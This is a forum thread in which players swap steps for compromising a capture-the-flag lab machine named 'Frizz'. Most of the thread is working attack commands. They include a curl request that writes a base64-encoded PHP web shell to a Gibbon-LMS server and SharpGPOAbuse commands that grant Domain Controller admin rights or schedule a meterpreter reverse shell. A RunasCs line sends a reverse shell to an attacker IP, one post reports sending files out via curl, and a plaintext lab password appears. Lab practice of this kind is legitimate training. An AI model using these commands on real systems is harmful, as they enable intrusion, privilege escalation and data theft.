[CYRUS_flame]

guys i was just wondering how do you all got schoolbus password i found the 7z files but i couldn't neither download them nor decompress them

[cryptocracks]

Thanks for the help! I managed to get everything up to the final root part. How many more attempts do we need to make?

[FHP]

I have the feeling that adding M.SchoolBus to Administrators is not the intended way to root this box.
This method is breaking SSH access for M.SchoolBus + it solves the box for all other attackers.
I guess we should be able to use OU Class_Frizz to schedule an immediate task for v.frizzle, which is already an admin.
Has someone already tried this? No success on my side, but don't know why...

[jackpinto37]

I have the feeling that adding M.SchoolBus to Administrators is not the intended way to root this box.
This method is breaking SSH access for M.SchoolBus + it solves the box for all other attackers.
I guess we should be able to use OU Class_Frizz to schedule an immediate task for v.frizzle, which is already an admin.
Has someone already tried this? No success on my side, but don't know why...

One possible way is to schedule a task instead of adding the user as admin, for example, execute a take as "Administrator" that execute a meterpreter rev shell binary:

.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author Administrator --Command "cmd.exe" --Arguments "/c C:\Windows\Temp\meterpreter.exe" --GPOName "New GPO" --Force
gpupdate /force

This will open a meterpreter session in your local machine as NT AUTHORITY/SYSTEM.
Same can be done with another rev shell

[Ir0h]

guys i was just wondering how do you all got schoolbus password i found the 7z files but i couldn't neither download them nor decompress them

I exfiltrated them via cURL to my attacker machine. Highly recommend moving them elsewhere on the box (I created C:\temp for my own purposes) and renaming the files as the $ is interpreted by the CLI as a variable name. Use the uploadserver python tool to recieve it on the attacker machine.

---

I have the feeling that adding M.SchoolBus to Administrators is not the intended way to root this box.
This method is breaking SSH access for M.SchoolBus + it solves the box for all other attackers.
I guess we should be able to use OU Class_Frizz to schedule an immediate task for v.frizzle, which is already an admin.
Has someone already tried this? No success on my side, but don't know why...

Definitely breaks SSH if you disconnect after the attack is finished, but you can a) use RunasCs as schoolbus to execute whatever you need with elevated permissions (like throwing yourself a reverse shell) or, what I did, is use the credentials to authenticate impacket's psexec module with the cmd option to get a System shell.

[PangPang]

curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"

http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=

Can someone tell me how this exploit was found from the USD advisory? Like how the payload was made? 'gibbonPersonID' isn't mentioned at all in it.

[FHP]

I have the feeling that adding M.SchoolBus to Administrators is not the intended way to root this box.
This method is breaking SSH access for M.SchoolBus + it solves the box for all other attackers.
I guess we should be able to use OU Class_Frizz to schedule an immediate task for v.frizzle, which is already an admin.
Has someone already tried this? No success on my side, but don't know why...

One possible way is to schedule a task instead of adding the user as admin, for example, execute a take as "Administrator" that execute a meterpreter rev shell binary:

.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author Administrator --Command "cmd.exe" --Arguments "/c C:\Windows\Temp\meterpreter.exe" --GPOName "New GPO" --Force
gpupdate /force

This will open a meterpreter session in your local machine as NT AUTHORITY/SYSTEM.
Same can be done with another rev shell

Thanks!
This is what I have tried many times without success... Until I realized that I was using Class_Frizz OU instead of Domain Controlers! I guess it would have required v.frizzle to be logged in to execute the task.

[whatsgoingon1]

Can someone confirm if RunasCS works? I am not able to add myself in the local admins group with GPO

Just worked for me...  Below are the steps someone else posted earlier which I just ran and worked flawlessly.
I guess the only other possibility is the binaries in question...
wget https://github.com/byronkg/SharpGPOAbuse...OAbuse.exe
wget https://github.com/antonioCoco/RunasCs/r...unasCs.zip (then used the RunasCs.exe from this zip)

# get root
New-GPO -Name "doesnotmatter"
#add newlink to domain controllers
New-GPLink -Name "doesnotmatter" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
#add m.schoolbus to localadmin group
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName doesnotmatter
#force group policy update
gpupdate /force
#send yourself a revshell with admin rights:
.\RunasC.exe "M.SchoolBus" '!suBcig@MehTed!R' powershell.exe -r IP:9001

That fixed it for me...
I was using a premade version of the exes at first, and when it didn't work I cloned the git and compiled my own, which still wasn't working...

Downloaded the links you posted and it worked with no issue, so the problem must've been how I compiled them.

Thanks for the links.

[jonnybolt]

krb5.conf

[libdefaults]
    default_realm = FRIZZ.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = true
    ticket_lifetime = 24h
    renew_lifetime = 7d
    forwardable = true
    proxiable = true

[realms]
    FRIZZ.HTB = {
        kdc = frizzdc.frizz.htb
        admin_server = frizzdc.frizz.htb
        default_domain = frizz.htb
    }

[domain_realm]
    .frizz.htb = FRIZZ.HTB
    frizz.htb = FRIZZ.HTB

sudo ntpdate 10.10.11.60

getTGT.py frizz.htb/f.frizzle

export KRB5CCNAME=f.frizzle.ccache

ssh f.frizzle@10.10.11.60

This work for me

i did everything right. still this error . hate this machine ..

Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure.  Minor code may provide more information

It should work, when you ssh, try to use: ssh -o GSSAPITrustDNS=no -o GSSAPIAuthentication=yes f.frizzle@Frizz.htb

Jesus H ... been on this for days... finally got the ssh connection! Thanks a bunch !!

[slaesh]

curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"

http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=

Can someone tell me how this exploit was found from the USD advisory? Like how the payload was made? 'gibbonPersonID' isn't mentioned at all in it.

usd-2023-0025 - usd HeroLab its metioned here with a link to Github